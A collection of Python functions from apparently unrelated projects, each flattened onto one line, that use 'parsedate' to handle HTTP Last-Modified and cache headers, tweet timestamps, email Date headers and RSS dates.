def fetch_plugin(old_index, entry): lm_map = {plugin["thread_id"]: plugin for plugin in old_index.itervalues()} raw = read(entry.url) url, name = parse_plugin_zip_url(raw) if url is None: raise ValueError("Failed to find zip file URL for entry: %s" % repr(entry)) plugin = lm_map.get(entry.thread_id, None) if plugin is not None: # Previously downloaded plugin lm = datetime(*tuple(map(int, re.split(r"\D", plugin["last_modified"])))[:6]) request = urllib2.Request(url) request.get_method = lambda: "HEAD" with closing(urllib2.urlopen(request)) as response: info = response.info() slm = datetime(*parsedate(info.get("Last-Modified"))[:6]) if lm >= slm: # The previously downloaded plugin zip file is up-to-date update_plugin_from_entry(plugin, entry) return plugin raw, info = read(url, get_info=True) slm = datetime(*parsedate(info.get("Last-Modified"))[:6]) plugin = get_plugin_info(raw) plugin["last_modified"] = slm.isoformat() plugin["file"] = "staging_%s.zip" % entry.thread_id plugin["size"] = len(raw) plugin["original_url"] = url update_plugin_from_entry(plugin, entry) with open(plugin["file"], "wb") as f: f.write(raw) return plugin
def serve_static_content(content): """ This is for serving arbritary content from sources like in-memory caches where we don't want to write the content to disk Headers like Content-Type and Last-Modified must have already been set as needed, e.g. cherrypy.response.headers['Content-Type'] = 'text/css' so we can properly compare Last-Modified with If-Modified-Since in the request If Last-Modified is not set, we will fall back to 200 and return the content """ if cherrypy.request.headers.get('Pragma') == 'no-cache' or cherrypy.request.headers.get('Cache-Control') == 'no-cache': # Hard reload (Command-Shift-R) # HTTP response code will be set to 200 upstream cherrypy.response.body = content elif not cherrypy.request.headers.get('If-Modified-Since'): # first request # HTTP response code will be set to 200 upstream cherrypy.response.body = content elif not cherrypy.response.headers.get('Last-Modified'): # no way to see whether content is outdated - 200 to be safe # HTTP response code will be set to 200 upstream cherrypy.response.body = content elif parsedate(cherrypy.response.headers.get('Last-Modified')) > parsedate(cherrypy.request.headers.get('If-Modified-Since')): # content passed in is newer than what the browser has # HTTP response code will be set to 200 upstream cherrypy.response.body = content else: cherrypy.response.status = 304 # unset unnecessary headers if cherrypy.response.headers.get('Last-Modified'): del cherrypy.response.headers['Last-Modified'] if cherrypy.response.headers.get('Content-Type'): del cherrypy.response.headers['Content-Type'] if cherrypy.response.headers.get('Expires'): del cherrypy.response.headers['Expires']
def _update_response_headers(self, request, response, headers): """ Combine all headers that were set by the different content types We are interested in Cache-Control, Last-Modified, Expires """ from django.utils.http import http_date # Ideally, for the Cache-Control header, we'd want to do some intelligent # combining, but that's hard. Let's just collect and unique them and let # the client worry about that. cc_headers = set() for x in (cc.split(",") for cc in headers.get('Cache-Control', ())): cc_headers |= set((s.strip() for s in x)) if len(cc_headers): response['Cache-Control'] = ", ".join(cc_headers) else: # Default value response['Cache-Control'] = 'no-cache, must-revalidate' # Check all Last-Modified headers, choose the latest one lm_list = [parsedate(x) for x in headers.get('Last-Modified', ())] if len(lm_list) > 0: response['Last-Modified'] = http_date(mktime(max(lm_list))) # Check all Expires headers, choose the earliest one lm_list = [parsedate(x) for x in headers.get('Expires', ())] if len(lm_list) > 0: response['Expires'] = http_date(mktime(min(lm_list)))
def wsgi_serve_static(self, path, environ, start_response): headers = [] resource = vfs.internal_resources[path] if resource.mtime: # unfortunately, this is usually only present when running under python 3.x... mtime_formatted = formatdate(resource.mtime) etag = self.etag(id(vfs.internal_resources), resource.mtime, path) if_modified = environ.get("HTTP_IF_MODIFIED_SINCE") if if_modified: if parsedate(if_modified) >= parsedate(mtime_formatted): # the resource wasn't modified since last requested return self.wsgi_not_modified(start_response) if_none = environ.get("HTTP_IF_NONE_MATCH") if if_none and (if_none == "*" or etag in if_none): return self.wsgi_not_modified(start_response) headers.append(("ETag", etag)) headers.append(("Last-Modified", formatdate(resource.mtime))) if type(resource.data) is bytes: headers.append(("Content-Type", resource.mimetype)) data = resource.data else: headers.append(("Content-Type", resource.mimetype + "; charset=utf-8")) data = resource.data.encode("utf-8") start_response("200 OK", headers) return [data]
def fetch_plugin(old_index, entry): lm_map = {plugin['thread_id']:plugin for plugin in old_index.itervalues()} raw = read(entry.url) url, name = parse_plugin_zip_url(raw) plugin = lm_map.get(entry.thread_id, None) if plugin is not None: # Previously downloaded plugin lm = datetime(*tuple(map(int, re.split(r'\D', plugin['last_modified'])))[:6]) request = urllib2.Request(url) request.get_method = lambda : 'HEAD' with closing(urllib2.urlopen(request)) as response: info = response.info() slm = datetime(*parsedate(info.get('Last-Modified'))[:6]) if lm >= slm: # The previously downloaded plugin zip file is up-to-date update_plugin_from_entry(plugin, entry) return plugin raw, info = read(url, get_info=True) slm = datetime(*parsedate(info.get('Last-Modified'))[:6]) plugin = get_plugin_info(raw) plugin['last_modified'] = slm.isoformat() plugin['file'] = 'staging_%s.zip' % entry.thread_id plugin['size'] = len(raw) plugin['original_url'] = url update_plugin_from_entry(plugin, entry) with open(plugin['file'], 'wb') as f: f.write(raw) return plugin
def UrlChecker(job, param, headers): if "last-modified" in headers: last_update = eut.parsedate(headers["last-modified"]) else: last_update = eut.parsedate(strftime("%a, %d %b %Y %H:%M:%S GMT", gmtime())) db = NoSQL(param["database"]["engine"], {"host": param["database"]["host"], "port": param["database"]["port"], "db": param["database"]["db"]["urlcache"]}) result_str = db.get(job.identifier) # For the url that has never been cached before or deleted by LRU if result_str is None: result = { "last-modified": last_update, "url": job.url, } # TODO: shouldn't pickle at this levl db.set(job.identifier, pk.dumps(result)) return False, result result = pk.loads(result_str) # For the urls that is not cached but has the same identifer if result["url"] != job.url: result["url"] = job.url result["last-modified"] = last_update db.set(job.identifier, pk.dumps(result)) return False, result cached_date = result["last-modified"] hour_diff = (mktime(last_update) - mktime(cached_date))/3600 if hour_diff >= param["crawlperiod"]: result["last-modified"] = last_update db.set(job.identifier, pk.dumps(result)) return False, result return True, result
def wsgi_serve_static(self, path: str, environ: Dict[str, Any], start_response: WsgiStartResponseType) -> Iterable[bytes]: headers = [] resource = vfs.internal_resources[path] if resource.mtime: mtime_formatted = formatdate(resource.mtime) etag = self.etag(id(vfs.internal_resources), resource.mtime, path) if_modified = environ.get('HTTP_IF_MODIFIED_SINCE') if if_modified: if parsedate(if_modified) >= parsedate(mtime_formatted): # type: ignore # the resource wasn't modified since last requested return self.wsgi_not_modified(start_response) if_none = environ.get('HTTP_IF_NONE_MATCH') if if_none and (if_none == '*' or etag in if_none): return self.wsgi_not_modified(start_response) headers.append(("ETag", etag)) headers.append(("Last-Modified", formatdate(resource.mtime))) if resource.is_text: # text headers.append(('Content-Type', resource.mimetype + "; charset=utf-8")) data = resource.text.encode("utf-8") else: # binary headers.append(('Content-Type', resource.mimetype)) data = resource.data start_response('200 OK', headers) return [data]
def content_loaded(self, url, response): if response.status_code > 399 or response.text is None: if response.text: headers = None if response.status_code == 404: text = None else: text = response.text.decode('rotunicode') else: text = 'Empty response.text' headers = response.headers msg = "Could not load '%s' (%s) - %s!" % (url, response.status_code, text) logging.error(msg) if headers is not None: logging.warning('Response is from cache: %s' % response.from_cache) logging.warning('Headers for "%s": %s' % (url, headers)) return logging.debug('Content for url %s loaded.' % url) last_modified = None modified = response.headers.get('Last-Modified', None) if modified is not None: date = eut.parsedate(modified) if date is not None: last_modified = datetime(*date[:6]) self.review_dao.last_modified = last_modified expires = None expires_key = response.headers.get('Expires', None) if expires_key: date = eut.parsedate(expires_key) if date is not None: expires = datetime(*date[:6]) self.review_dao.expires = expires self._current = response try: self._current.html = lxml.html.fromstring(response.text) except (lxml.etree.XMLSyntaxError, lxml.etree.ParserError): self._current.html = None self.run_facters() self.wait_for_async_requests() self.run_validators() self.wait_for_async_requests() self.save_review()
def check_statuses(self): debug("In check_statuses") try: updates = reversed(self.twitter.statuses.home_timeline()) except Exception as e: print("Exception while querying twitter:", file=sys.stderr) traceback.print_exc(file=sys.stderr) return nextLastUpdate = self.lastUpdate for update in updates: try: # This part raises lots of exceptions which kill the bot # (Unicode errors, etc.) # Ignore any exceptions, as a band-aid. crt = parsedate(update['created_at']) if (crt > nextLastUpdate): text = (htmlentitydecode( update['text'].replace('\n', ' ')) .encode('utf8', 'replace')) # Skip updates beginning with @ # TODO This would be better if we only ignored messages # to people who are not on our following list. if not text.startswith(b"@"): msg = "%s %s%s%s %s" %( get_prefix(), IRC_BOLD, update['user']['screen_name'], IRC_BOLD, text.decode('utf8')) self.privmsg_channels(msg) nextLastUpdate = crt except Exception as e: print("Exception while sending updates:", file=sys.stderr) traceback.print_exc(file=sys.stderr) pass # don't return as this one is likely to keep happening crt = parsedate(update['created_at']) if (crt > nextLastUpdate): text = (htmlentitydecode( update['text'].replace('\n', ' ')) .encode('utf8', 'replace')) # Skip updates beginning with @ # TODO This would be better if we only ignored messages # to people who are not on our following list. if not text.startswith(b"@"): msg = "%s %s%s%s %s" %( get_prefix(), IRC_BOLD, update['user']['screen_name'], IRC_BOLD, text.decode('utf8')) self.privmsg_channels(msg) nextLastUpdate = crt self.lastUpdate = nextLastUpdate
def __init__(self, url, calendar, metadata): EventResource.__init__(self, url) self.calendar = calendar self.metadata = metadata self.events = None if not self.metadata.has_key("created") and self.metadata.has_key("date"): self.metadata["created"] = DateTime(parsedate(self.metadata["date"])[:7]) if self.metadata.has_key("last-modified") and not isinstance(self.metadata["last-modified"], DateTime): self.metadata["last-modified"] = DateTime(parsedate(self.metadata["last-modified"])[:7])
def __call__(self, environ, start_response): """Respond to a request when called in the usual WSGI way.""" if environ['REQUEST_METHOD'] not in ('GET', 'HEAD'): return self.method_not_allowed(environ, start_response) path_info = environ.get('PATH_INFO', '') full_path = self._full_path(path_info) """If not under root then return file not found""" if not self._is_under_root(full_path): return self.not_found(environ, start_response) """ if file is a directory then return moved permanently or a directory index file""" if path.isdir(full_path): if full_path[-1] != '/' or full_path == self.root: location = util.request_uri(environ, include_query=False) + '/' if environ.get('QUERY_STRING'): location += '?' + environ.get('QUERY_STRING') headers = [('Location', location)] return self.moved_permanently(environ, start_response, headers) else: full_path = self._full_path(path_info + self.index_file) #Innocent unless proved guilty if_gzip = False #if accept encoding contain gzip if 'gzip' in environ['HTTP_ACCEPT_ENCODING']: # check if gzip version exists if path.exists(full_path + '.gz'): if_gzip = True full_path = full_path + '.gz' content_type = self._guess_type(full_path) try: etag, last_modified = self._conditions(full_path, environ) headers = [('Date', formatdate(time.time())), ('Last-Modified', last_modified), ('ETag', etag)] if_modified = environ.get('HTTP_IF_MODIFIED_SINCE') if if_modified and (parsedate(if_modified) >= parsedate(last_modified)): return self.not_modified(environ, start_response, headers) if_none = environ.get('HTTP_IF_NONE_MATCH') if if_none and (if_none == '*' or etag in if_none): return self.not_modified(environ, start_response, headers) file_like = self._file_like(full_path) headers.append(('Content-Type', content_type)) if if_gzip: headers.append(('Content-Encoding', 'gzip')) headers.append(('Vary', 'Accept-Encoding')) start_response("200 OK", headers) if environ['REQUEST_METHOD'] == 'GET': return self._body(full_path, environ, file_like) else: return [''] except (IOError, OSError): return self.not_found(environ, start_response)
def lastMessageTime( self ): ''' Returns date of the last message in mailbox ''' lastMsgTime = 0 if len( self.inbox ) > 0: lastMsgTime = calendar.timegm( parsedate( sorted( self.inbox.itervalues(), key=lambda item: ( parsedate( item['Date'] ), item ) )[-1]['Date'] ) ) return lastMsgTime
def __call__(self, environ, start_response): """Respond to a request when called in the usual WSGI way.""" if environ['REQUEST_METHOD'] not in ('GET', 'HEAD'): headers = [('Allow', 'GET, HEAD')] return self.method_not_allowed(environ, start_response, headers) path_info = environ.get('PATH_INFO', '') full_path = self._full_path(path_info) if not self._is_under_root(full_path): return self.not_found(environ, start_response) if path.isdir(full_path): if full_path[-1] != '/' or full_path == self.root: location = util.request_uri(environ, include_query=False) + '/' if environ.get('QUERY_STRING'): location += '?' + environ.get('QUERY_STRING') headers = [('Location', location)] return self.moved_permanently(environ, start_response, headers) else: full_path = self._full_path(path_info + self.index_file) prezipped = ('gzip' in environ.get('HTTP_ACCEPT_ENCODING', []) and path.exists(full_path + '.gz')) if prezipped: full_path += '.gz' content_type = self._guess_type(full_path) try: etag, last_modified = self._conditions(full_path, environ) headers = [('Date', rfc822.formatdate(time.time())), ('Last-Modified', last_modified), ('ETag', etag)] if_modified = environ.get('HTTP_IF_MODIFIED_SINCE') if if_modified and (rfc822.parsedate(if_modified) >= rfc822.parsedate(last_modified)): return self.not_modified(environ, start_response, headers) if_none = environ.get('HTTP_IF_NONE_MATCH') if if_none and (if_none == '*' or etag in if_none): return self.not_modified(environ, start_response, headers) file_like = self._file_like(full_path) headers.append(('Content-Type', content_type)) if prezipped: headers.extend([('Content-Encoding', 'gzip'), ('Vary', 'Accept-Encoding')]) self._add_headers(headers, path_info, content_type) start_response("200 OK", headers) if environ['REQUEST_METHOD'] == 'GET': return self._body(full_path, environ, file_like) else: return [b''] except (IOError, OSError) as e: print(e) return self.not_found(environ, start_response)
def _tweet_for_template(tweet, https=False): """Return the dict needed for tweets.html to render a tweet + replies.""" data = json.loads(tweet.raw_json) parsed_date = parsedate(data['created_at']) date = datetime(*parsed_date[0:6]) # Recursively fetch replies. if settings.CC_SHOW_REPLIES: # If ever slow, optimize to do fewer queries. replies = _get_tweets(limit=0, reply_to=tweet, https=https) else: replies = None if 'from_user' in data: # For tweets collected using v1 API user_data = data from_user = data['from_user'] else: user_data = data['user'] from_user = user_data['screen_name'] if https: img = bleach.clean(user_data['profile_image_url_https']) else: img = bleach.clean(user_data['profile_image_url']) return {'profile_img': img, 'user': from_user, 'text': bleach.clean(data['text']), 'id': tweet.pk, 'date': date, 'reply_count': len(replies) if replies else 0, 'replies': replies, 'reply_to': tweet.reply_to and tweet.reply_to.pk, 'hidden': tweet.hidden}
def _callback_fetch_stylesheet(self, response, subreddit): if not response: logger.error("Failed to fetch css for {}".format(subreddit)) return if response.status_code != 200: logger.error("Failed to fetch css for {} (Status {})".format(subreddit, response.status_code)) return text = response.text.encode('utf-8') modified_date_tuple = parsedate(response.headers['Last-Modified']) modified_date_timestamp = calendar.timegm(modified_date_tuple) css_cache_file_path = get_file_path(response.url, rootdir=self.reddit_cache ) with self.mutex: if not os.path.exists(os.path.dirname(css_cache_file_path)): os.makedirs(os.path.dirname(css_cache_file_path)) css_subreddit_path = path.join(self.session_cache, subreddit.lower()) + '.css' with open( css_cache_file_path, 'w' ) as f: f.write( text ) utime(css_cache_file_path, (time.time(), modified_date_timestamp)) os.symlink(os.path.relpath(css_cache_file_path, self.session_cache + '/'), css_subreddit_path );
def update_releases(forced=False): '''Uses the sources list in DB to search for contracts''' sources = db.session.query(Source).all() updated_sources = 0 for source in sources: print source.url if re.match("^http", source.url): #TODO: With the fixture we are not testing this part which is fairly sensitive r = requests.head(source.url) #If Last-Modified not avaiable, we always process now = datetime.now() source_update = now if 'Last-Modified' in r.headers: source_update = datetime(*eut.parsedate(r.headers['Last-Modified'])[:6]) if forced or source_update >= source.last_retrieve : load_source(source) updated_sources += 1 else: load_source(source) updated_sources += 1 if updated_sources > 0: compute_supplier_size() #Let's flush the cache cache.init_app(app, config={'CACHE_TYPE': 'simple'}) with app.app_context(): cache.clear()
def closest(self): """ Use the HTTP Last-Modified header to determine the most recent date. If we cannot determine the date, we fail (maybe fallback to some weekly value instead). """ if not hasattr(self, 'sid'): raise AttributeError('assumed task has a parameter sid, but it does not') url = self.config.get('nrw', 'url%s' % self.sid) resp = requests.head(url) if resp.status_code != 200: raise RuntimeError('%s on %s' % (resp.status_code, self.url)) value = resp.headers.get('Last-Modified') if value is None: raise RuntimeError('HTTP Last-Modified header not found') parsed_date = eut.parsedate(value) if parsed_date is None: raise RuntimeError('could not parse Last-Modifier header') last_modified_date = datetime.date(*parsed_date[:3]) return last_modified_date
def parse(self): page = Page() text = page.download(self.url) e = etree.parse(StringIO.StringIO(text)) rss = e.getroot() for item in rss.findall('.//item'): ar = {"node":"solo"} fields = {"title":"title", "link":"link", "summary":"description", "content":"content","author":"author","pubdate":"pubDate","page_url":"guid"} for k2 in fields: k = fields[k2] node = item.find(k) if node is not None: text = node.text if k == "description": text = re.sub(r'</?\w+[^>]*>','',text); if k == "pubDate": t = datetime.datetime(*eut.parsedate(text)[:6]) text = t.strftime('%Y-%m-%d %H:%M:%S') ar[k2] = text if ar.get("author") is None: ar["author"] = "cnbeta.com" ar["type"] = "1" if ar.has_key("page_url"): m = md5.new() m.update(ar.get("page_url")) ar["reference_id"] = m.hexdigest() #print ar rowid = self.db.addItem(ar) print ar.get("title"), rowid
def download(url, local, is_gzipped): modified_local = -1 modified_remote = 0 if is_gzipped: url = url + '.gz' # get last-modified remote headers = urllib.urlopen(url).info().headers for header in headers: if 'Last-Modified' in header: modified_remote = time.mktime(parsedate(header.strip('Last-Modified: ').strip('\r\n'))) # get last-modified local (if any) try: modified_local = os.path.getmtime(local) except os.error: modified_local = -1 # only download if last-modified differs if modified_local < modified_remote: logger.info("Downloading " + url) if (is_gzipped): urllib.urlretrieve(url, local + ".gz") # gunzip in_f = gzip.open(local + ".gz", "rb") out_f = open(local, 'wb') out_f.write(in_f.read() ) in_f.close() out_f.close() else: urllib.urlretrieve(url, local) else: logger.info("Not downloading " + url + " - already got " + local)
def _check_headers(self, headers, body, status=None): # check the response headers and process response body if needed. # 1, make sure we have all headers header_names = [ 'x-ots-contentmd5', 'x-ots-requestid', 'x-ots-date', 'x-ots-contenttype', ] if status >= 200 and status < 300: for name in header_names: if not name in headers: raise OTSClientError('"%s" is missing in response header.' % name) # 2, check md5 if 'x-ots-contentmd5' in headers: md5 = base64.b64encode(hashlib.md5(body).digest()) if md5 != headers['x-ots-contentmd5']: raise OTSClientError('MD5 mismatch in response.') # 3, check date if 'x-ots-date' in headers: try: server_time = parsedate(headers['x-ots-date']) except ValueError: raise OTSClientError('Invalid date format in response.') # 4, check date range server_unix_time = calendar.timegm(server_time) now_unix_time = time.time() if abs(server_unix_time - now_unix_time) > 15 * 60: raise OTSClientError('The difference between date in response and system time is more than 15 minutes.')
def collect_frequency_data(self, message, headers=None): """ Store data about frequency of message submission from sender of this message. 'headers', if specified, is a list of header names to store along with times, for use as discriminators. """ user = message['From'] date = message.get('Date') if date is not None: date = parsedate(date) if date is not None: date = datetime(*date[:6]) else: date = datetime.now() if headers is None: headers = {} else: headers = dict([(name, message[name]) for name in headers]) times = self._freq_data.get(user) if times is None: times = _FreqData() self._freq_data[user] = times times.append((date,headers))
def _parsegmtime(timestring): """Return a standard time tuple (see time and calendar), for a date/time string.""" # Sun, 06 Nov 1994 08:49:37 GMT ; RFC 822, updated by RFC 1123 try: return time.strptime(timestring, "%a, %d %b %Y %H:%M:%S GMT") except: pass # Sunday, 06-Nov-94 08:49:37 GMT ; RFC 850, obsoleted by RFC 1036 try: return time.strptime(timestring, "%A %d-%b-%y %H:%M:%S GMT") except: pass # Sun Nov 6 08:49:37 1994 ; ANSI C's asctime() format try: return time.strptime(timestring, "%a %b %d %H:%M:%S %Y") except: pass # Sun Nov 6 08:49:37 1994 +0100 ; ANSI C's asctime() format with timezon try: return parsedate(timestring) except: pass return None
def trigger(self): try: print "Processing email from:", self.message['From'] e = {} e['From'] = [t.lower() for t in self.message['From'].strip().split(' ') if t.strip() != '' and t[0] == '<'] if 'From' in self.message else [] e['From'] = e['From'][0] e['To'] = [t.lower() for t in self.message['To'].strip().split(' ') if t.strip() != ''] if 'To' in self.message else [] e['Cc'] = [t.lower() for t in self.message['Cc'].strip().split(' ') if t.strip() != ''] if 'Cc' in self.message else [] d_ = parsedate(self.message['Date'].strip()) e['Date'] = time.mktime(d_) if d_ else None e['Body'] = self.get_email_body() f = features_for_email(e) est = lr.predict(f)[0] est = int(math.ceil(est)) if "<*****@*****.**>" in e['To'] or "*****@*****.**" in e['To']: if est > 2 and est < 168: print "Sending email for " + str(est) + " hour estimate to " + e['From'] send_email(e['From'], est, reply=self.message['Message-ID']) else: print "Did not send email for " + str(est) + " hour estimate to " + e['From'] else: print "Did not respond to " + e['From'] + " because the message was not directed to me" except: print "Error occurred - aborting..."
def parse_from_file(email_file): ''' return_type: message.Message ''' with open(email_file) as f: e = email.message_from_file(f) # print(e["Message-ID"]) date = datetime.datetime.fromtimestamp(time.mktime(parsedate(e["Date"]))) print(type(e["Date"])) print(e["Date"]) print(type(date)) print(date) # print(e["From"]) # print(e["To"]) # print(e["Subject"]) # print(e["Mime-Version"]) # print(e["Content-Type"]) # print(e["Content-Transfer-Encoding"]) # print(e["X-From"]) # print(e["X-To"]) # print(e["X-cc"]) # print(e["X-bcc"]) # print(e["X-Folder"]) # print(e["X-Origin"]) # print(e["X-FileName"]) # print(e.get_payload()) if e.is_multipart(): for payload in e.get_payload(): # if payload.is_multipart(): ... print payload.get_payload() else: print e.get_payload() print len(e.get_payload())
def update_headers(self, response): date = parsedate(response.headers['date']) expires = datetime(*date[:6]) + timedelta(seconds=0) return { 'expires': formatdate(calendar.timegm(expires.timetuple())), 'cache-control': 'public', }
def check_statuses(self): debug("In check_statuses") try: updates = reversed(self.twitter.statuses.home_timeline()) except Exception as e: print("Exception while querying twitter:", file=sys.stderr) traceback.print_exc(file=sys.stderr) return nextLastUpdate = self.lastUpdate for update in updates: crt = parsedate(update['created_at']) if (crt > nextLastUpdate): if 'retweeted_status' in update: text = 'RT @{}: {}'.format( update['retweeted_status']['user']['screen_name'], htmlentitydecode( update['retweeted_status']['text'].replace('\n', ' ')) .encode('utf8', 'replace') ) else: text = (htmlentitydecode( update['text'].replace('\n', ' ')) .encode('utf8', 'replace')) msg = "%s %s%s:%s %s" % ( get_prefix(), IRC_BOLD, update['user']['screen_name'], IRC_BOLD, text.decode('utf8')) self.privmsg_channels(msg) nextLastUpdate = crt self.lastUpdate = nextLastUpdate
def _extract_msg_data(msg, field): def do_multi(data): try: __x = filterNone(set(data.split(field_multis[field]))) except AttributeError: __x = data if hasattr(__x, '__iter__'): try: __x = [ i.strip() for i in __x ] except AttributeError: pass return __x field_name = field_map.get(field, field) __data = field_action_map.get(field_name, lambda msg: msg.get(field_name, None))(msg) if __data is None: if field not in field_multis: return None else: __data = [] if field in field_multis: __data = do_multi(__data) elif field == 'sent': __data = datetime(*parsedate(__data)[:6]) return __data
def parse_status(status): if 'retweeted_status' in status and _user.official_retweet: status = status['retweeted_status'] msg_dict = {'content': unescape(status['text']), 'id': str(status['id'])} if 'user' in status: msg_dict['username'] = status['user']['screen_name'] Db.set_cache(status) elif 'sender' in status: msg_dict['username'] = status['sender_screen_name'] else: msg_dict['username'] = '' if msg_dict['username'] and _user.bold_username: msg_dict['username'] = '******' % msg_dict['username'] username = _user.enabled_user username_at = "@" + username short_id = None if username_at in msg_dict['content']: if _user.bold_username: msg_dict['content'] = msg_dict['content'].replace(username_at, '*%s*' % username_at) if 'user' in status: short_id = generate_short_id(status['id']) msg_dict['shortid'] = '#' + str(short_id) if short_id is not None else '' utc = pytz.utc t = parsedate(status['created_at'])[:6] t = datetime(*t) utc_dt = utc.localize(t) tz = pytz.timezone(_user.timezone) t = tz.normalize(utc_dt.astimezone(tz)) msg_dict['time'] = t.strftime(_user.date_format.encode('UTF-8')).decode('UTF-8') if 'source' in status: source = re.match(r'<a .*>(.*)</a>', status['source']) msg_dict['source'] = source.group(1) if source else status['source'] else: msg_dict['source'] = '' return Template(unicode(_user.msg_template)).safe_substitute(msg_dict)
def fetch_data(self): url = self.get_url() self.log.info("Fetching %s" % url) response = self.http_session.get(url) responsetime = eut.parsedate(response.headers['date']) responsesec = calendar.timegm(responsetime) self.log.info('response date: %s -> %d (%d)' % (response.headers['date'], responsesec, int(responsesec / 5))) doc = etree.fromstring(response.content) dishList = doc.xpath('/dsn/dish') dishes = {} for dish in dishList: dish_name, data = self.parse_dish(dish) dishes[dish_name] = data stationList = doc.xpath('/dsn/station') stations = {} for station in stationList: station_name, data = self.parse_station(station) stations[station_name] = data timeElem = doc.xpath('/dsn/timestamp') result = { 'stations': stations, 'dishes': dishes, 'time': to_int(timeElem[0].text) } return result
def update_headers(self, resp): headers = resp.headers if 'expires' in headers: return {} if 'cache-control' in headers and headers['cache-control'] != 'public': return {} if resp.status not in self.cacheable_by_default_statuses: return {} if 'date' not in headers or 'last-modified' not in headers: return {} date = calendar.timegm(parsedate_tz(headers['date'])) last_modified = parsedate(headers['last-modified']) if date is None or last_modified is None: return {} now = time.time() current_age = max(0, now - date) delta = date - calendar.timegm(last_modified) freshness_lifetime = max(0, min(delta / 10, 24 * 3600)) if freshness_lifetime <= current_age: return {} expires = date + freshness_lifetime return {'expires': time.strftime(TIME_FMT, time.gmtime(expires))}
def main(): # Part 0. Prepare environment log = open(MFCNS_LOGFILE, 'a') logfd = log.fileno() os.dup2(logfd, STDOUT_FILENO) os.dup2(logfd, STDERR_FILENO) lprintf('MFCns_handler started') atexit.register(cleanup) # Part I. Spool dir processing mfc_rex = re.compile(MFC_PTRN) for filename in os.listdir(MFCNS_SPOOL): filename = os.path.join(MFCNS_SPOOL, filename) if not os.path.isfile(filename): lprintf('%s: not a file found in the spool directory', filename) continue lprintf('Processing "%s"...', filename) fdes = open(filename, 'r', encoding='utf-8') message = message_from_file(fdes) date = list(parsedate(message['Date'])) fdes.seek(0, 0) content = fdes.readlines() fdes.close() mfc_in = -1 for line in content: result = mfc_rex.match(line) if result == None: continue mfc_in = int(result.group('ndays')) measure = result.group('measr') if measure == None: pass elif measure[0:4] == 'week': mfc_in *= 7 elif measure[0:5] == 'month': mfc_in *= 30 if mfc_in < 0: lprintf('%s: doesn\'t look like a MFC notification request', filename) continue date[3] = date[4] = date[5] = 0 timestamp = time.mktime(tuple(date)) timestamp += mfc_in * SECSADAY date = time.localtime(timestamp) strdate = '%d%02d%02d' % tuple(date[0:3]) destdir = os.path.join(MFCNS_QUEUE, strdate) if not os.path.exists(destdir): os.mkdir(destdir) if not os.path.isdir(destdir): raise IOError(errno.ENOTDIR, 'Not a directory', destdir) os.rename(filename, os.path.join(destdir, os.path.basename(filename))) # Part II. Queue processing timestamp = time.time() cdate = time.localtime(timestamp) today = int('%d%02d%02d' % tuple(cdate[0:3])) mfc_tral_rex = re.compile(MFC_TRAL) do_sleep = 0 for dname in os.listdir(MFCNS_QUEUE): fdir = os.path.join(MFCNS_QUEUE, dname) if not (os.path.isdir(fdir) and len(dname) == 8 and int(dname) <= today): continue for filename in os.listdir(fdir): if do_sleep == 1: time.sleep(SENDBREAK) filename = os.path.join(fdir, filename) if not os.path.isfile(filename): lprintf('%s: not a file found in the queue directory', filename) continue lprintf('Processing "%s"...', filename) fdes = open(filename, 'r', encoding='utf-8') message = message_from_file(fdes) to = parseaddr(message['From']) subject = message['Subject'] branch = message.get('X-FreeBSD-CVS-Branch', None) if branch == None: branch = message['X-SVN-Group'] fdes.seek(0, 0) content = fdes.readlines() fdes.close() i = 0 for line in content: result = mfc_tral_rex.match(line) if result != None: content = content[:i] break i += 1 sendnote(to, subject, branch, content) lprintf('MFC notification sent to "%s" <%s>', to) os.unlink(filename) do_sleep = 1 if len(os.listdir(fdir)) == 0: os.rmdir(fdir) else: lprintf('%s: directory can\'t be deleted because it is not empty', fdir)
def twitter(SeriesHelper): try: for tweet in tweet_iter: # turn the date string into a date object that python can handle print(json.loads(json.dumps(tweet))) # lines = json.loads(tweet) # for line in lines: # print (tweet) tweet_id = tweet["id_str"] location_colored = colored(tweet["user"]["location"], "red") location = tweet["user"]["location"] # possibly_sensitive = tweet["possibly_sensitive"] # print (possibly_sensitive ,json.loads(json.dumps(tweet))) # withheld_in_countries = tweet["user"]["withheld_in_countries"] # if tweet["place"] != 'None': # print (tweet["place"]) # place = json.loads(line) # print (place['country_code']) # place = json.dumps(tweet['place']) # print (place) timestamp = parsedate(tweet["created_at"]) # now format this nicely into HH:MM:SS format timetext = strftime("%Y%m%d%H%M%S", timestamp) retweet_count = tweet["retweet_count"] # colour our tweet's time, user and text time_colored = colored(timetext, color="white", attrs=["bold"]) user_colored = colored(tweet["user"]["screen_name"], "green") user = tweet["user"]["screen_name"] followers_count = tweet["user"]["followers_count"] lang = tweet["user"]["lang"] text = tweet["text"] symbols = tweet["entities"]["symbols"] # for line in hashtags: # print (line) time_zone = tweet["user"]["time_zone"] statuses_count = tweet["user"]["statuses_count"] # if 'text' in tweet["entities"]["hashtags"]: # hashtags = tweet["entities"]["hashtags"]['text'] # print (hashtags) # replace each instance of our search terms with a highlighted version text_colored = pattern.sub(colored(search_term.upper(), "yellow"), text) # add some indenting to each line and wrap the text nicely indent = " " * 0 text_colored = fill(text_colored, 180, initial_indent=indent, subsequent_indent=indent) # myclient.write_points(json.dump(tweet,separators=",")) tweet_json = [{ "measurement": "tweet", "tags": { "lang": lang, "time_zone": time_zone }, "created_at": timestamp, "fields": { "id": tweet_id, "followers_count": followers_count, "retweet_count": retweet_count, "text": text, "location": location, "user": user, "statuses_count": statuses_count, } }] # myclient.write_points(tweet_json) # tweet_record(id=tweet_id, created_at=timestamp, text=text, tweet='tweet') # user = user, # now output our tweet # print (symbols) print("%s |%s| |%s| @%s |%s| [%s] %s %s" % (time_colored, time_zone, location_colored, user_colored, statuses_count, followers_count, lang, text_colored)) except InfluxDBClientError as e: print("DB_ERROR:", 'Error %s' % e)
